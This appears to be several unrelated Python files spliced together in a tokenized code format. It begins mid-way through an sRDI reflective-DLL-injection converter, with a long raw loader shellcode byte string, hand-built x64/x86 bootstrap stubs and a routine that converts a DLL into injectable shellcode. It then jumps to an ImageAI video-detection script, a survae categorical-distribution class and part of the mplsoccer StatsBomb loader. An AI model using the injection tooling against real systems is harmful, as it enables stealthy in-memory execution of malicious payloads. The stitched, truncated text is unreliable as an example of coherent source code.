x24\x7C\x61\x74\x69\x76'<concat>b'\xC7\x45\x80\x65\x53\x79\x73\xC7\x45\x84\x74\x65\x6D\x49\x66\xC7\x45\x88\x6E\x66\xC6\x45'<concat>b'\x8A\x6F\xC7\x45\x90\x52\x74\x6C\x41\xC7\x45\x94\x64\x64\x46\x75\xC7\x45\x98\x6E\x63\x74'<concat>b'\x69\xC7\x45\x9C\x6F\x6E\x54\x61\x66\xC7\x45\xA0\x62\x6C\xE8\x7F\x08\x00\x00\xB9\xB5\x41'<concat>b'\xD9\x5E\x48\x8B\xD8\xE8\x72\x08\x00\x00\x4C\x8B\xE8\x48\x89\x45\xD0\x48\x8D\x45\xD8\xC7'<concat>b'\x45\x20\x18\x00\x18\x00\x4C\x8D\x4C\x24\x38\x48\x89\x45\x28\x4C\x8D\x45\x20\x33\xD2\x33'<concat>b'\xC9\xFF\xD3\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x48\x45\x33\xC0\x48\x89\x44\x24\x30\x4C'<concat>b'\x8D\x4D\xC8\xC7\x44\x24\x28\x0C\x00\x0C\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C'<concat>b'\x24\x38\x48\x8D\x44\x24\x68\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\x00\xC7\x44\x24'<concat>b'\x28\x0E\x00\x0E\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8D\x45\xA8\xC7\x44\x24\x28\x15'<concat>b'\x00\x15\x00\x48\x8B\x4C\x24\x38\x4C\x8D\x4D\x08\x45\x33\xC0\x48\x89\x44\x24\x30\x48\x8D'<concat>b'\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x78\x45\x33\xC0\x48\x89\x44'<concat>b'\x24\x30\x4C\x8D\x4D\x10\xC7\x44\x24\x28\x13\x00\x13\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5'<concat>b'\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x40\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\xF0'<concat>b'\xC7\x44\x24\x28\x05\x00\x05\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48'<concat>b'\x8D\x45\x90\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\x18\xC7\x44\x24\x28\x13\x00\x13'<concat>b'\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x58\x45\x33\xC0'<concat>b'\x48\x89\x44\x24\x30\x4C\x8D\x4D\xF8\xC7\x44\x24\x28\x0C\x00\x0C\x00\x48\x8D\x54\x24\x28'<concat>b'\x41\xFF\xD5\x4C\x39\x7D\xC8\x0F\x84\x1D\x07\x00\x00\x4C\x39\x7D\x00\x0F\x84\x13\x07\x00'<concat>b'\x00\x4C\x39\x7D\xF0\x0F\x84\x09\x07\x00\x00\x4C\x39\x7D\x08\x0F\x84\xFF\x06\x00\x00\x48'<concat>b'\x8B\x55\x10\x48\x85\xD2\x0F\x84\xF2\x06\x00\x00\x48\x63\x7E\x3C\x48\x03\xFE\x81\x3F\x50'<concat>b'\x45\x00\x00\x0F\x85\xDF\x06\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x0F\x85\xD0\x06'<concat>b'\x00\x00\x45\x8D\x4F\x01\x44\x84\x4F\x38\x0F\x85\xC2\x06\x00\x00\x0F\xB7\x4F\x14\x41\x8B'<concat>b'\xDF\x48\x83\xC1\x24\x66\x44\x3B\x7F\x06\x73\x25\x44\x0F\xB7\x47\x06\x48\x03\xCF\x44\x39'<concat>b'\x79\x04\x8B\x47\x38\x0F\x45\x41\x04\x03\x01\x48\x8D\x49\x28\x3B\xC3\x0F\x46\xC3\x8B\xD8'<concat>b'\x4D\x2B\xC1\x75\xE3\x48\x8D\x4D\x38\xFF\xD2\x8B\x55\x3C\x44\x8B\xC2\x44\x8D\x72\xFF\xF7'<concat>b'\xDA\x44\x03\x77\x50\x49\x8D\x48\xFF\x8B\xC2\x4C\x23\xF0\x8B\xC3\x48\x03\xC8\x49\x8D\x40'<concat>b'\xFF\x48\xF7\xD0\x48\x23\xC8\x4C\x3B\xF1\x0F\x85\x54\x06\x00\x00\x48\x8B\x4F\x30\x41\xBC'<concat>b'\x00\x30\x00\x00\x45\x8B\xC4\x41\xB9\x04\x00\x00\x00\x49\x8B\xD6\xFF\x55\xC8\x48\x8B\xD8'<concat>b'\x48\x85\xC0\x75\x12\x44\x8D\x48\x04\x45\x8B\xC4\x49\x8B\xD6\x33\xC9\xFF\x55\xC8\x48\x8B'<concat>b'\xD8\x44\x8B\xA5\xD0\x00\x00\x00\x41\xBB\x01\x00\x00\x00\x45\x84\xE3\x74\x1D\x8B\x46\x3C'<concat>b'\x89\x43\x3C\x8B\x56\x3C\xEB\x0B\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54'<concat>b'\x72\xF0\xEB\x19\x41\x8B\xD7\x44\x39\x7F\x54\x76\x10\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88'<concat>b'\x04\x19\x3B\x57\x54\x72\xF0\x48\x63\x7B\x3C\x45\x8B\xD7\x48\x03\xFB\x48\x89\x7D\x30\x44'<concat>b'\x0F\xB7\x47\x14\x49\x83\xC0\x28\x66\x44\x3B\x7F\x06\x73\x3A\x4C\x03\xC7\x45\x8B\xCF\x45'<concat>b'\x39\x38\x76\x1F\x41\x8B\x50\x04\x41\x8B\x48\xFC\x41\x8B\xC1\x45\x03\xCB\x48\x03\xC8\x48'<concat>b'\x03\xD0\x8A\x04\x32\x88\x04\x19\x45\x3B\x08\x72\xE1\x0F\xB7\x47\x06\x45\x03\xD3\x49\x83'<concat>b'\xC0\x28\x44\x3B\xD0\x72\xC9\x4C\x8B\xF3\x41\xB8\x02\x00\x00\x00\x4C\x2B\x77\x30\x0F\x84'<concat>b'\xD6\x00\x00\x00\x44\x39\xBF\xB4\x00\x00\x00\x0F\x84\xC9\x00\x00\x00\x44\x8B\x8F\xB0\x00'<concat>b'\x00\x00\x4C\x03\xCB\x45\x39\x39\x0F\x84\xB6\x00\x00\x00\x4D\x8D\x51\x08\xE9\x91\x00\x00'<concat>b'\x00\x45\x0F\xB7\x1A\x41\x0F\xB7\xCB\x41\x0F\xB7\xC3\x66\xC1\xE9\x0C\x66\x83\xF9\x0A\x75'<concat>b'\x29\x45\x8B\x01\x41\x81\xE3\xFF\x0F\x00\x00\x4B\x8D\x04\x18\x48\x8B\x14\x18\x4B\x8D\x04'<concat>b'\x18\x41\xBB\x01\x00\x00\x00\x49\x03\xD6\x48\x89\x14\x18\x45\x8D\x43\x01\xEB\x4F\x41\xBB'<concat>b'\x01\x00\x00\x00\x66\x83\xF9\x03\x75\x0E\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x8B\xC6'<concat>b'\xEB\x2E\x66\x41\x3B\xCB\x75\x15\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x49\x8B\xC6\x48\xC1'<concat>b'\xE8\x10\x0F\xB7\xC0\xEB\x13\x66\x41\x3B\xC8\x75\x14\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03'<concat>b'\x41\x0F\xB7\xC6\x41\x8B\x11\x48\x01\x04\x0A\x4D\x03\xD0\x41\x8B\x41\x04\x49\x03\xC1\x4C'<concat>b'\x3B\xD0\x0F\x85\x5F\xFF\xFF\xFF\x4D\x8B\xCA\x45\x39\x3A\x0F\x85\x4A\xFF\xFF\xFF\x44\x39'<concat>b'\xBF\x94\x00\x00\x00\x0F\x84\x82\x01\x00\x00\x8B\x8F\x90\x00\x00\x00\x45\x8B\xEF\x4C\x8D'<concat>b'\x04\x19\x49\x8D\x40\x0C\xEB\x07\x45\x03\xEB\x48\x8D\x40\x14\x44\x39\x38\x75\xF4\x41\x8B'<concat>b'\xC4\x83\xE0\x04\x89\x45\xC0\x8B\xC1\x0F\x84\x89\x00\x00\x00\x45\x3B\xEB\x0F\x86\x80\x00'<concat>b'\x00\x00\x41\xC1\xEC\x10\x45\x8D\x5D\xFF\x45\x8B\xD7\x45\x85\xDB\x74\x74\x4D\x8B\xC8\x41'<concat>b'\xBE\xFF\x7F\x00\x00\x41\x0F\x10\x01\x33\xD2\x41\x8B\xCD\x41\x2B\xCA\x69\xF6\xFD\x43\x03'<concat>b'\x00\x41\x8B\xC6\xF7\xF1\x33\xD2\x81\xC6\xC3\x9E\x26\x00\x8D\x48\x01\x8B\xC6\xC1\xE8\x10'<concat>b'\x41\x23\xC6\xF7\xF1\x41\x03\xC2\x41\xFF\xC2\x48\x8D\x0C\x80\x41\x8B\x54\x88\x10\x41\x0F'<concat>b'\x10\x0C\x88\x41\x0F\x11\x04\x88\x41\x8B\x41\x10\x41\x89\x44\x88\x10\x41\x0F\x11\x09\x41'<concat>b'\x89\x51\x10\x4D\x8D\x49\x14\x45\x3B\xD3\x72\xA1\x8B\x87\x90\x00\x00\x00\xEB\x04\x44\x8B'<concat>b'\x65\xC0\x8B\xF0\x48\x03\xF3\x8B\x46\x0C\x85\xC0\x0F\x84\xB1\x00\x00\x00\x8B\x7D\xC0\x8B'<concat>b'\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x4C\x8B\xD0\x44\x8B\x36\x44\x8B\x7E\x10'<concat>b'\x4C\x03\xF3\x4C\x03\xFB\x49\x8B\x0E\x48\x85\xC9\x74\x5F\x48\x85\xC9\x79\x08\x45\x0F\xB7'<concat>b'\x06\x33\xD2\xEB\x32\x48\x8D\x53\x02\x33\xC0\x48\x03\xD1\x38\x02\x74\x0E\x48\x8B\xCA\x48'<concat>b'\xFF\xC1\x48\xFF\xC0\x80\x39\x00\x75\xF5\x48\x89\x54\x24\x30\x45\x33\xC0\x48\x8D\x54\x24'<concat>b'\x28\x66\x89\x44\x24\x28\x66\x89\x44\x24\x2A\x4D\x8B\xCF\x49\x8B\xCA\xFF\x55\xD0\x49\x83'<concat>b'\xC6\x08\x49\x83\xC7\x08\x49\x8B\x0E\x48\x85\xC9\x74\x07\x4C\x8B\x54\x24\x38\xEB\xA1\x45'<concat>b'\x33\xFF\x85\xFF\x74\x10\x41\x83\xFD\x01\x76\x0A\x41\x69\xCC\xE8\x03\x00\x00\xFF\x55\xF0'<concat>b'\x8B\x46\x20\x48\x83\xC6\x14\x85\xC0\x0F\x85\x56\xFF\xFF\xFF\x48\x8B\x7D\x30\x4C\x8B\x6D'<concat>b'\xD0\x44\x39\xBF\xF4\x00\x00\x00\x0F\x84\xA9\x00\x00\x00\x44\x8B\xBF\xF0\x00\x00\x00\x49'<concat>b'\x83\xC7\x04\x4C\x03\xFB\x45\x33\xE4\x41\x8B\x07\x85\xC0\x0F\x84\x8A\x00\x00\x00\x8B\xC8'<concat>b'\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x48\x8B\xC8\x41\x8B\x77\x08\x45\x8B\x77\x0C'<concat>b'\x48\x03\xF3\x4C\x03\xF3\x4C\x39\x26\x74\x5E\x49\x8B\x16\x48\x85\xD2\x79\x08\x44\x0F\xB7'<concat>b'\xC2\x33\xD2\xEB\x34\x4C\x8D\x43\x02\x49\x8B\xC4\x4C\x03\xC2\x45\x38\x20\x74\x0E\x49\x8B'<concat>b'\xD0\x48\xFF\xC2\x48\xFF\xC0\x44\x38\x22\x75\xF5\x4C\x89\x44\x24\x30\x48\x8D\x54\x24\x28'<concat>b'\x45\x33\xC0\x66\x89\x44\x24\x28\x66\x89\x44\x24\x2A\x4C\x8B\xCE\x41\xFF\xD5\x48\x83\xC6'<concat>b'\x08\x49\x83\xC6\x08\x4C\x39\x26\x74\x07\x48\x8B\x4C\x24\x38\xEB\xA2\x49\x83\xC7\x20\xE9'<concat>b'\x6B\xFF\xFF\xFF\x45\x33\xFF\x0F\xB7\x77\x14\x45\x8B\xF7\x48\x83\xC6\x28\x41\xBC\x01\x00'<concat>b'\x00\x00\x66\x44\x3B\x7F\x06\x0F\x83\x0B\x01\x00\x00\x48\x03\xF7\x44\x39\x3E\x0F\x84\xEB'<concat>b'\x00\x00\x00\x8B\x46\x14\x8B\xC8\x81\xE1\x00\x00\x00\x20\x75\x17\x0F\xBA\xE0\x1E\x72\x11'<concat>b'\x85\xC0\x78\x0D\x45\x8B\xC4\x44\x89\x64\x24\x20\xE9\xA4\x00\x00\x00\x85\xC9\x75\x3C\x0F'<concat>b'\xBA\xE0\x1E\x72\x0A\x85\xC0\x79\x06\x44\x8D\x41\x08\xEB\x68\x85\xC9\x75\x28\x0F\xBA\xE0'<concat>b'\x1E\x73\x0A\x85\xC0\x78\x06\x44\x8D\x41\x02\xEB\x54\x85\xC9\x75\x14\x0F\xBA\xE0\x1E\x73'<concat>b'\x0A\x85\xC0\x79\x06\x44\x8D\x41\x04\xEB\x40\x85\xC9\x74\x5F\x0F\xBA\xE0\x1E\x72\x0C\x85'<concat>b'\xC0\x78\x08\x41\xB8\x10\x00\x00\x00\xEB\x2A\x85\xC9\x74\x49\x0F\xBA\xE0\x1E\x72\x0C\x85'<concat>b'\xC0\x79\x08\x41\xB8\x80\x00\x00\x00\xEB\x14\x85\xC9\x74\x33\x0F\xBA\xE0\x1E\x73\x11\x85'<concat>b'\xC0\x78\x0D\x41\xB8\x20\x00\x00\x00\x44\x89\x44\x24\x20\xEB\x21\x85\xC9\x74\x18\x0F\xBA'<concat>b'\xE0\x1E\x73\x12\x44\x8B\x44\x24\x20\x85\xC0\xB9\x40\x00\x00\x00\x44\x0F\x48\xC1\xEB\xDD'<concat>b'\x44\x8B\x44\x24\x20\xF7\x46\x14\x00\x00\x00\x04\x74\x0A\x41\x0F\xBA\xE8\x09\x44\x89\x44'<concat>b'\x24\x20\x8B\x4E\xFC\x4C\x8D\x4C\x24\x20\x8B\x16\x48\x03\xCB\xFF\x55\x00\x0F\xB7\x47\x06'<concat>b'\x45\x03\xF4\x48\x83\xC6\x28\x44\x3B\xF0\x0F\x82\xF8\xFE\xFF\xFF\x45\x33\xC0\x33\xD2\x48'<concat>b'\x83\xC9\xFF\xFF\x55\x08\x44\x39\xBF\xD4\x00\x00\x00\x74\x24\x8B\x87\xD0\x00\x00\x00\x48'<concat>b'\x8B\x74\x18\x18\xEB\x0F\x45\x33\xC0\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x48\x8D\x76\x08\x48'<concat>b'\x8B\x06\x48\x85\xC0\x75\xE9\x4C\x8B\x4D\x18\x4D\x85\xC9\x74\x2F\x8B\x87\xA4\x00\x00\x00'<concat>b'\x85\xC0\x74\x25\x8B\xC8\x4C\x8B\xC3\x48\xB8\xAB\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x48\xF7\xE1'<concat>b'\x8B\x8F\xA0\x00\x00\x00\x48\xC1\xEA\x03\x48\x03\xCB\x41\x2B\xD4\x41\xFF\xD1\x8B\x47\x28'<concat>b'\x4D\x8B\xC4\x48\x03\xC3\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x8B\xB5\xB8\x00\x00\x00\x85\xF6'<concat>b'\x0F\x84\x97\x00\x00\x00\x44\x39\xBF\x8C\x00\x00\x00\x0F\x84\x8A\x00\x00\x00\x8B\x8F\x88'<concat>b'\x00\x00\x00\x48\x03\xCB\x44\x8B\x59\x18\x45\x85\xDB\x74\x78\x44\x39\x79\x14\x74\x72\x44'<concat>b'\x8B\x49\x20\x41\x8B\xFF\x8B\x51\x24\x4C\x03\xCB\x48\x03\xD3\x45\x85\xDB\x74\x5D\x45\x8B'<concat>b'\x01\x45\x8B\xD7\x4C\x03\xC3\x74\x52\xEB\x0D\x0F\xBE\xC0\x44\x03\xD0\x41\xC1\xCA\x0D\x4D'<concat>b'\x03\xC4\x41\x8A\x00\x84\xC0\x75\xEC\x41\x3B\xF2\x75\x05\x48\x85\xD2\x75\x12\x41\x03\xFC'<concat>b'\x49\x83\xC1\x04\x48\x83\xC2\x02\x41\x3B\xFB\x73\x22\xEB\xC3\x8B\x41\x1C\x0F\xB7\x0A\x48'<concat>b'\x03\xC3\x8B\x95\xC8\x00\x00\x00\x44\x8B\x04\x88\x48\x8B\x8D\xC0\x00\x00\x00\x4C\x03\xC3'<concat>b'\x41\xFF\xD0\x48\x8B\xC3\xEB\x02\x33\xC0\x48\x8B\x9C\x24\xB0\x01\x00\x00\x48\x81\xC4\x70'<concat>b'\x01\x00\x00\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x5F\x5E\x5D\xC3\xCC\x48\x8B\xC4\x48\x89\x58'<concat>b'\x08\x48\x89\x68\x10\x48\x89\x70\x18\x48\x89\x78\x20\x41\x56\x48\x83\xEC\x10\x65\x48\x8B'<concat>b'\x04\x25\x60\x00\x00\x00\x8B\xE9\x45\x33\xF6\x48\x8B\x50\x18\x4C\x8B\x4A\x10\x4D\x8B\x41'<concat>b'\x30\x4D\x85\xC0\x0F\x84\xB3\x00\x00\x00\x41\x0F\x10\x41\x58\x49\x63\x40\x3C\x41\x8B\xD6'<concat>b'\x4D\x8B\x09\xF3\x0F\x7F\x04\x24\x46\x8B\x9C\x00\x88\x00\x00\x00\x45\x85\xDB\x74\xD2\x48'<concat>b'\x8B\x04\x24\x48\xC1\xE8\x10\x66\x44\x3B\xF0\x73\x22\x48\x8B\x4C\x24\x08\x44\x0F\xB7\xD0'<concat>b'\x0F\xBE\x01\xC1\xCA\x0D\x80\x39\x61\x7C\x03\x83\xC2\xE0\x03\xD0\x48\xFF\xC1\x49\x83\xEA'<concat>b'\x01\x75\xE7\x4F\x8D\x14\x18\x45\x8B\xDE\x41\x8B\x7A\x20\x49\x03\xF8\x45\x39\x72\x18\x76'<concat>b'\x8E\x8B\x37\x41\x8B\xDE\x49\x03\xF0\x48\x8D\x7F\x04\x0F\xBE\x0E\x48\xFF\xC6\xC1\xCB\x0D'<concat>b'\x03\xD9\x84\xC9\x75\xF1\x8D\x04\x13\x3B\xC5\x74\x0E\x41\xFF\xC3\x45\x3B\x5A\x18\x72\xD5'<concat>b'\xE9\x5E\xFF\xFF\xFF\x41\x8B\x42\x24\x43\x8D\x0C\x1B\x49\x03\xC0\x0F\xB7\x14\x01\x41\x8B'<concat>b'\x4A\x1C\x49\x03\xC8\x8B\x04\x91\x49\x03\xC0\xEB\x02\x33\xC0\x48\x8B\x5C\x24\x20\x48\x8B'<concat>b'\x6C\x24\x28\x48\x8B\x74\x24\x30\x48\x8B\x7C\x24\x38\x48\x83\xC4\x10\x41\x5E\xC3 '<line_sep># MARKER:E
<if_stmt>sRDI.is64BitDLL(dll_bytes)<block_start>rdi_shellcode=rdi_shellcode64<line_sep>bootstrap=b''<line_sep>bootstrap_size=64<line_sep># call next instruction (Pushes next instruction address to stack)
bootstrap<augadd>b'\xe8\x00\x00\x00\x00'<line_sep># Set the offset to our DLL from pop result
dll_offset=bootstrap_size-len(bootstrap)+len(rdi_shellcode)<line_sep># pop rcx - Capture our current location in memory
bootstrap<augadd>b'\x59'<line_sep># mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
bootstrap<augadd>b'\x49\x89\xc8'<line_sep># add rcx, <Offset of the DLL>
bootstrap<augadd>b'\x48\x81\xc1'<line_sep>bootstrap<augadd>struct.pack('I' dll_offset)<line_sep># mov edx, <Hash of function>
bootstrap<augadd>b'\xba'<line_sep>bootstrap<augadd>struct.pack('I' function_hash)<line_sep># Setup the location of our user data
# add r8, <Offset of the DLL> + <Length of DLL>
bootstrap<augadd>b'\x49\x81\xc0'<line_sep>user_data_location=dll_offset+len(dll_bytes)<line_sep>bootstrap<augadd>struct.pack('I' user_data_location)<line_sep># mov r9d, <Length of User Data>
bootstrap<augadd>b'\x41\xb9'<line_sep>bootstrap<augadd>struct.pack('I' len(user_data))<line_sep># push rsi - save original value
bootstrap<augadd>b'\x56'<line_sep># mov rsi, rsp - store our current stack pointer for later
bootstrap<augadd>b'\x48\x89\xe6'<line_sep># and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
bootstrap<augadd>b'\x48\x83\xe4\xf0'<line_sep># sub rsp, 0x30 - Create some breathing room on the stack
bootstrap<augadd>b'\x48\x83\xec'<line_sep>bootstrap<augadd>b'\x30'# 32 bytes for shadow space + 8 bytes for last arg + 8 bytes for stack alignment
# mov dword ptr [rsp + 0x20], <Flags> - Push arg 5 just above shadow space
bootstrap<augadd>b'\xC7\x44\x24'<line_sep>bootstrap<augadd>b'\x20'<line_sep>bootstrap<augadd>struct.pack('I' flags)<line_sep># call - Transfer execution to the RDI
bootstrap<augadd>b'\xe8'<line_sep>bootstrap<augadd>struct.pack('b' bootstrap_size-len(bootstrap)-4)<line_sep># Skip over the remainder of instructions
bootstrap<augadd>b'\x00\x00\x00'<line_sep># mov rsp, rsi - Reset our original stack pointer
bootstrap<augadd>b'\x48\x89\xf4'<line_sep># pop rsi - Put things back where we left them
bootstrap<augadd>b'\x5e'<line_sep># ret - return to caller
bootstrap<augadd>b'\xc3'<if_stmt>len(bootstrap)<ne>bootstrap_size<block_start><raise>Exception(f"x64 bootstrap length: {len(bootstrap)} != bootstrap_size: {bootstrap_size}")<block_end># Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
<return>bootstrap+rdi_shellcode+dll_bytes+user_data<block_end><else_stmt># 32 bit
<block_start>rdi_shellcode=rdi_shellcode32<line_sep>bootstrap=b''<line_sep>bootstrap_size=49<line_sep># call next instruction (Pushes next instruction address to stack)
bootstrap<augadd>b'\xe8\x00\x00\x00\x00'<line_sep># Set the offset to our DLL from pop result
dll_offset=bootstrap_size-len(bootstrap)+len(rdi_shellcode)<line_sep># pop eax - Capture our current location in memory
bootstrap<augadd>b'\x58'<line_sep># push ebp
bootstrap<augadd>b'\x55'<line_sep># mov ebp, esp
bootstrap<augadd>b'\x89\xe5'<line_sep># mov edx, eax - copy our location in memory to ebx before we start modifying eax
bootstrap<augadd>b'\x89\xc2'<line_sep># add eax, <Offset to the DLL>
bootstrap<augadd>b'\x05'<line_sep>bootstrap<augadd>struct.pack('I' dll_offset)<line_sep># add edx, <Offset to the DLL> + <Size of DLL>
bootstrap<augadd>b'\x81\xc2'<line_sep>user_data_location=dll_offset+len(dll_bytes)<line_sep>bootstrap<augadd>struct.pack('I' user_data_location)<line_sep># push <Flags>
bootstrap<augadd>b'\x68'<line_sep>bootstrap<augadd>struct.pack('I' flags)<line_sep># push <Length of User Data>
bootstrap<augadd>b'\x68'<line_sep>bootstrap<augadd>struct.pack('I' len(user_data))<line_sep># push edx
bootstrap<augadd>b'\x52'<line_sep># push <hash of function>
bootstrap<augadd>b'\x68'<line_sep>bootstrap<augadd>struct.pack('I' function_hash)<line_sep># push eax
bootstrap<augadd>b'\x50'<line_sep># call - Transfer execution to the RDI
bootstrap<augadd>b'\xe8'<line_sep>bootstrap<augadd>struct.pack('b' bootstrap_size-len(bootstrap)-4)<line_sep># Skip over the remainder of instructions
bootstrap<augadd>b'\x00\x00\x00'<line_sep># add esp, 0x14 - remove arguments from stack (cdecl)
bootstrap<augadd>b'\x83\xc4\x14'<line_sep># leave
bootstrap<augadd>b'\xc9'<line_sep># ret - return to caller
bootstrap<augadd>b'\xc3'<if_stmt>len(bootstrap)<ne>bootstrap_size<block_start><raise>Exception(f"x86 bootstrap length: {len(bootstrap)} != bootstrap_size: {bootstrap_size}")<block_end># Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
<return>bootstrap+rdi_shellcode+dll_bytes+user_data<block_end><block_end><def_stmt>transform self target<block_start>dll=open(target 'rb').read()<line_sep>flags=self.flags<line_sep>converted=sRDI.ConvertToShellcode(dll sRDI.HashFunctionName(self.function) self.args flags)<line_sep><return>converted<block_end><def_stmt>set_additional_arguments self **kwargs<block_start><if_stmt>"function"<in>kwargs['kwargs'].keys()<block_start>function=kwargs['kwargs']['function']<if_stmt>function<and>function<ne>""<block_start>self.function=function<block_end><block_end><if_stmt>"params"<in>kwargs['kwargs'].keys()<block_start>params=kwargs['kwargs']['params']<if_stmt>params<and>params<ne>""<block_start>self.args=params<block_end><block_end><block_end><block_end> |
<import_from_stmt>imageai.Detection.Custom CustomVideoObjectDetection<import_stmt>os<line_sep>execution_path=os.getcwd()<line_sep>video_detector=CustomVideoObjectDetection()<line_sep>video_detector.setModelTypeAsYOLOv3()<line_sep>video_detector.setModelPath("hololens-ex-60--loss-2.76.h5")# download via https://github.com/OlafenwaMoses/ImageAI/releases/download/essential-v4/hololens-ex-60--loss-2.76.h5
video_detector.setJsonPath("detection_config.json")# download via https://github.com/OlafenwaMoses/ImageAI/releases/download/essential-v4/detection_config.json
video_detector.loadModel()<line_sep>video_detector.detectObjectsFromVideo(input_file_path="holo1.mp4" output_file_path=os.path.join(execution_path "holo1-detected3") frames_per_second=20 minimum_percentage_probability=40 log_progress=<true>)<line_sep> |
<import_stmt>torch<import_from_stmt>torch.distributions Categorical<import_from_stmt>survae.distributions.conditional ConditionalDistribution<import_from_stmt>survae.utils sum_except_batch<class_stmt>ConditionalCategorical(ConditionalDistribution)<block_start>"""A Categorical distribution with conditional logits."""<def_stmt>__init__ self net<block_start>super(ConditionalCategorical self).__init__()<line_sep>self.net=net<block_end><def_stmt>cond_dist self context<block_start>logits=self.net(context)<line_sep><return>Categorical(logits=logits)<block_end><def_stmt>log_prob self x context<block_start>dist=self.cond_dist(context)<line_sep><return>sum_except_batch(dist.log_prob(x))<block_end><def_stmt>sample self context<block_start>dist=self.cond_dist(context)<line_sep><return>dist.sample()<block_end><def_stmt>sample_with_log_prob self context<block_start>dist=self.cond_dist(context)<line_sep>z=dist.sample()<line_sep>log_prob=dist.log_prob(z)<line_sep>log_prob=sum_except_batch(log_prob)<line_sep><return>z log_prob<block_end><def_stmt>logits self context<block_start><return>self.cond_dist(context).logits<block_end><def_stmt>probs self context<block_start><return>self.cond_dist(context).probs<block_end><def_stmt>mode self context<block_start><return>self.cond_dist(context).logits.argmax(-1)<block_end><block_end> |
""" `mplsoccer.statsbomb` is a python module for loading StatsBomb data. """<line_sep># Authors: <NAME>, https://twitter.com/numberstorm
# License: MIT
<import_stmt>os<import_stmt>warnings<import_stmt>numpy<as>np<import_stmt>pandas<as>pd<line_sep>EVENT_SLUG='https://raw.githubusercontent.com/statsbomb/open-data/master/data/events'<line_sep>MATCH_SLUG='https://raw.githubusercontent.com/statsbomb/open-data/master/data/matches'<line_sep>LINEUP_SLUG='https://raw.githubusercontent.com/statsbomb/open-data/master/data/lineups'<line_sep>COMPETITION_URL=('https://raw.githubusercontent.com/statsbomb/open-data/'<concat>'master/data/competitions.json')<line_sep>STATSBOMB_WARNING=('Please be responsible with Statsbomb data.'<concat>'Register your details on https://www.statsbomb.com/resource-centre'<concat>'and read the User Agreement carefully (on the same page).')<def_stmt>_split_location_cols df col new_cols<block_start>""" Location is stored as a list. split into columns. """<for_stmt>new_col new_cols<block_start>df[new_col]=np.nan<block_end><if_stmt>col<in>df.columns<block_start>mask_not_null=df[col].notnull()<line_sep>df_not_null=df.loc[mask_not_null col]<line_sep>df_new=pd.DataFrame(df_not_null.tolist() index=df_not_null.index)<line_sep>new_cols=new_cols[:len(df_new.columns)]# variable whether z location is present
df_new.columns=new_cols<line_sep>df.loc[mask_not_null new_cols]=df_new<line_sep>df.drop(col axis=1 inplace=<true>)<block_end><block_end><def_stmt>_list_dictionary_to_df df col value_name var_name id_col='id'<block_start>""" Some columns are a list of dictionaries. This turns them into a new dataframe of rows."""<line_sep>df=df.loc[df[col].notnull() [id_col col]]<line_sep>df.set_index(id_col inplace=<true>)<line_sep>df=df[col].apply(pd.Series).copy()<line_sep>df.reset_index(inplace=<true>)<line_sep>df=df.melt(id_vars=id_col value_name=value_name var_name=var_name)<line_sep>df[var_name]=df[var_name]+1<line_sep>df=df[df[value_name].notnull()].copy()<line_sep>df.reset_index(inplace=<true> drop=<true>)<line_sep><return>df<block_end><def_stmt>_split_dict_col df col<block_start>""" Function to split a dictionary column to separate columns."""<line_sep># handle missing data by filling with an empty dictionary
df[col]=df[col].apply(<lambda>x:{}<if>pd.isna(x)<else>x)<line_sep># split the non-missing data and change the column names
df_temp_cols=pd.json_normalize(df[col]).set_index(df.index)<line_sep>col_names=df_temp_cols.columns<line_sep># note add column description to column name if doesn't already contain it
col_names=[c.replace('.' '_')<if>c[:len(col)]<eq>col<else>(col+'_'+c).replace('.' '_')<for>c col_names]<line_sep>df[col_names]=df_temp_cols<line_sep># drop old column
df.drop(col axis=1 inplace=<true>)<line_sep><return>df<block_end><def_stmt>_simplify_cols_and_drop df col cols=<none><block_start>""" Function to merge similar columns together and drop original columns. """<if_stmt>cols<is><none><block_start>cols=df.columns[df.columns.str.contains(col)]<block_end>df_melt=df[cols].melt(ignore_index=<false>).copy()<line_sep>df_melt=df_melt[df_melt.value.notnull()].copy()<line_sep>df.loc[df_melt.index col]=df_melt.value<line_sep>df.drop(cols axis=1 errors='ignore' inplace=<true>)<line_sep><return>df<block_end><def_stmt>read_event path_or_buf related_event_df=<true> shot_freeze_frame_df=<true> tactics_lineup_df=<true> warn=<true><block_start>""" Extracts individual event json and loads as a dictionary of up to
four pandas.DataFrame: ``event``, ``related event``, ``shot_freeze_frame``,
and ``tactics_lineup``.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
related_event_df : bool, default True
Whether to return a ``related_event`` Dataframe in the returned dictionary.
shot_freeze_frame_df : bool, default True
Whether to return a ``shot_freeze_frame`` in the returned dictionary.
tactics_lineup_df : bool, default True
Whether to return a ``tactics_lineup`` Dataframe in the returned dictionary.
warn : bool, default True
